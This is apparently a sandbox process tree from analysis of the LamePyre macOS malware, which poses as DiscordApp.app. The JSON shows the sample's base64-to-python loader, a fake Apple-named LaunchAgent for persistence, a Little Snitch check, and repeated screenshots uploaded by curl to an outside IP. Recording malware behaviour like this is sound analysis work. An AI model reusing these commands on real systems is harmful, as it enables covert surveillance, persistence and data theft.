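LamePyre Process Tree (macOS)

Process activity recorded while running the DiscordApp.app sample. A bash one-liner pipes a base64-decoded payload into /usr/bin/python, which creates a hidden ~/.system directory, loads a LaunchAgent (com.apple.systemkeeper.plist) for persistence, and checks whether Little Snitch is running. Separately, bash repeatedly runs screencapture and uploads /tmp/alloy.png with curl over plain HTTP. Entries that repeat the same PID appear to be duplicate records of one process rather than separate launches.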

{
    "process_name": "/Users/zingo123/Downloads/LamePyre/DiscordApp.app/Contents/MacOS/Application Stub", 
    "pid": 2547, 
    "command_line_args": "./Application Stub", 
    "child_processes": [
        {
            "process_name": "/bin/bash", 
            "pid": 2549, 
            "command_line_args": "/bin/bash -c PAYLOAD_DATA=\"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\"echo $PAYLOAD_DATA | base64 -D | /usr/bin/python &", 
            "child_processes": [
                {
                    "process_name": "/usr/bin/base64", 
                    "pid": 2551, 
                    "command_line_args": "base64 -D"
                }, 
                {
                    "process_name": "/usr/bin/python", 
                    "pid": 2552, 
                    "command_line_args": "/usr/bin/python", 
                    "child_processes": [
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2557, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/.system"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2557, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/.system"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2558, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/Library/LaunchAgents"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2558, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/Library/LaunchAgents"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2559, 
                            "command_line_args": "/bin/sh -c launchctl load -w /Users/zingo123/Library/LaunchAgents/com.apple.systemkeeper.plist"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2559, 
                            "command_line_args": "/bin/sh -c launchctl load -w /Users/zingo123/Library/LaunchAgents/com.apple.systemkeeper.plist"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2561, 
                            "command_line_args": "/bin/sh -c ps -ef | grep Little\\ Snitch | grep -v grep", 
                            "child_processes": [
                                {
                                    "process_name": "/bin/ps", 
                                    "pid": 2562, 
                                    "command_line_args": "ps -ef"
                                }, 
                                {
                                    "process_name": "/usr/bin/grep", 
                                    "pid": 2564, 
                                    "command_line_args": "grep -v grep"
                                }, 
                                {
                                    "process_name": "/usr/bin/grep", 
                                    "pid": 2563, 
                                    "command_line_args": "grep Little Snitch"
                                }
                            ]
                        }
                    ]
                }, 
                {
                    "process_name": "/usr/sbin/screencapture", 
                    "pid": 2569, 
                    "command_line_args": "screencapture -C -x /tmp/alloy.png"
                }, 
                {
                    "process_name": "/usr/bin/curl", 
                    "pid": 2570, 
                    "command_line_args": "curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=564DD292-04E6-6771-00C7-92A750FA1B0D"
                }, 
                {
                    "process_name": "/usr/sbin/screencapture", 
                    "pid": 2577, 
                    "command_line_args": "screencapture -C -x /tmp/alloy.png"
                }, 
                {
                    "process_name": "/usr/bin/curl", 
                    "pid": 2579, 
                    "command_line_args": "curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=564DD292-04E6-6771-00C7-92A750FA1B0D"
                }
            ]
        }
    ]
}